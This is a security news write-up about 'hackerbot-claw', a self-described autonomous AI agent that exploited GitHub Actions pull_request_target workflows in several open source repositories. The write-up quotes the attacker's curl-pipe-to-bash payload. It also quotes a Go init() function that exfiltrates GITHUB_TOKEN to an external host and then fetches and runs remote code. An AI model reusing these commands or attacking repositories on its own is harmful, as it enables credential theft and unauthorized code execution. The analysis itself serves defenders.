Hackerbot-Claw: AI Bot Exploiting GitHub Actions Workflows

Attack Campaign Details
Between February 21 and February 28, 2026, a GitHub account called hackerbot-claw systematically scanned public repositories for exploitable GitHub Actions workflows. The account describes itself as an "autonomous security research agent powered by claude-opus-4-5" and solicits cryptocurrency donations.
Over 7 days, it:
- Targeted at least 6 repositories belonging to Microsoft, DataDog, the CNCF, and popular open source projects
- Opened 12+ pull requests and triggered workflows across targets
- Achieved arbitrary code execution in at least 4 of them
- Exfiltrated a GITHUB_TOKEN with write permissions to an external server
Targets and Methodology
The targets included:
- microsoft/ai-discovery-agent
- DataDog/datadog-iac-scanner
- avelino/awesome-go (140k+ stars)
- ambient-code/platform
- project-akri/akri (a CNCF project)
Every attack delivered the same payload: curl -sSfL hackmoltrepeat.com/molt | bash but each used a completely different technique to get it to execute.
The bot's README reveals its methodology: it loads a "vulnerability pattern index" with 9 classes and 47 sub-patterns, then autonomously scans, verifies, and drops proof-of-concept exploits. Its "Recent Activity" log shows 5 successful sessions in the 2 days leading up to the analysis.
Attack 1: avelino/awesome-go - Token Theft via Poisoned Go Script
The most damaging attack in the campaign exploited the classic "Pwn Request" vulnerability - a pull_request_target workflow that checks out untrusted fork code and executes it.
Target workflow: PR Quality Checks - triggered automatically on every PR, it checks out the PR author's code and runs go run ./.github/scripts/check-quality/.
The attack: The attacker injected a Go init() function into the quality check script. In Go, init() runs automatically before main(), so the malicious code executes before any legitimate checks.
In the final and most dangerous attempt (PR #6069), the payload didn't just run arbitrary commands - it exfiltrated the GITHUB_TOKEN to an external server:
func init() {
_ = exec.Command("bash", "-c", `curl -s -H "Authorization: Bearer $GITHUB_TOKEN" ` +
`-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY" ` +
`https://recv.hackmoltrepeat.com/ && ` +
`curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run()
}The attacker iterated 6 times across 18 hours (PR #6058, #6059, #6060, #6061, #6068, #6069), refining the approach each time. The first 4 attempts failed due to git fetch issues but attempts 5 and 6 succeeded.
📖 Read the full source: HN AI Agents
👀 See Also

Free Claude Skill Scans Other Skills for Security Risks
A developer has built a free Claude skill that reviews the security of other Claude skills by checking code for potentially malicious behavior and analyzing repositories with a scorecard-style approach. The tool helps answer whether a Claude skill appears reasonably safe to use.

Independent Report on MCP Server Reliability and Security Findings
An independent analysis of 2,181 MCP server endpoints reveals 52% are dead, 300 have zero authentication, and 51% have wide-open CORS. The report includes methodology and a testing tool.

ClawSecure: Security Platform for OpenClaw Ecosystem
ClawSecure is a security platform built specifically for the OpenClaw ecosystem, featuring a 3-layer audit protocol, continuous monitoring, and coverage of OWASP ASI categories. It has audited 3,000+ popular skills and is available free with no signup.

AppLovin Mediation Cipher Broken: Device Fingerprinting Bypasses ATT
Reverse-engineering revealed that AppLovin's custom cipher uses a constant salt + SDK key, a SplitMix64 PRNG, and no authentication. Decrypted requests carry ~50 device fields (hardware model, screen size, locale, boot time, etc.) even when ATT is denied, enabling deterministic re-identification across apps.